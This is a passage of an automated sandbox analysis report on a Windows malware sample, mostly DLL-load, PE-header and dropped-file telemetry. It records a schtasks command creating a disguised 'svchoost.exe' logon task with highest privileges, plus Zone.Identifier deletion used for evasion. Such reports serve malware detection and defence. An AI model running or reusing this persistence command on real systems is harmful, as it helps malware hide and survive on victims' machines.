                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: version.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\Users\Administrator\Desktop\libranceroom\x64\Release\libranceroom.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe
                  Source: Binary string: C:\Users\Administrator\Desktop\libranceroom\x64\Release\libranceroom.pdb/ source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76ACA99 push rbx; iretd 0_2_00007FF7E76ACA9A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B99D2A5 pushad ; iretd 17_2_00007FFD9B99D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9BB87BFC push esp; iretd 17_2_00007FFD9BB87BFD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9B9BD2A5 pushad ; iretd 21_2_00007FFD9B9BD2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9BBA3821 pushad ; iretd 21_2_00007FFD9BBA3841
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9BBA5112 pushad ; retf 21_2_00007FFD9BBA5131
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9B98D2A5 pushad ; iretd 27_2_00007FFD9B98D2A6
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9B98FBB5 pushfd ; iretd 27_2_00007FFD9B98FBB7
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BAB2BFA pushad ; ret 27_2_00007FFD9BAB2BFC
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BAB2BE1 pushad ; ret 27_2_00007FFD9BAB2BE2
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BAB2BBC pushad ; ret 27_2_00007FFD9BAB2BEC
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BAB1EF2 push ds; ret 27_2_00007FFD9BAB1F32
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BAB1ECC push ds; ret 27_2_00007FFD9BAB1F32
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BD3836E pushad ; retf FFFDh27_2_00007FFD9BD383ED
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 27_2_00007FFD9BE32321 push edx; retf 5F20h27_2_00007FFD9BE35A3B
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exeJump to dropped file
                  Source: C:\WCTVN\mmytljldrgl.exeFile created: C:\Users\user\AppData\Roaming\SubDir\Client.exeJump to dropped file
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeFile created: C:\WCTVN\mmytljldrgl.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\WCTVN\mmytljldrgl.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\WCTVN\mmytljldrgl.exeFile opened: C:\WCTVN\mmytljldrgl.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\WCTVN\mmytljldrgl.exeFile opened: C:\Users\user\AppData\Roaming\SubDir\Client.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeFile opened: C:\Users\user\AppData\Roaming\SubDir\Client.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
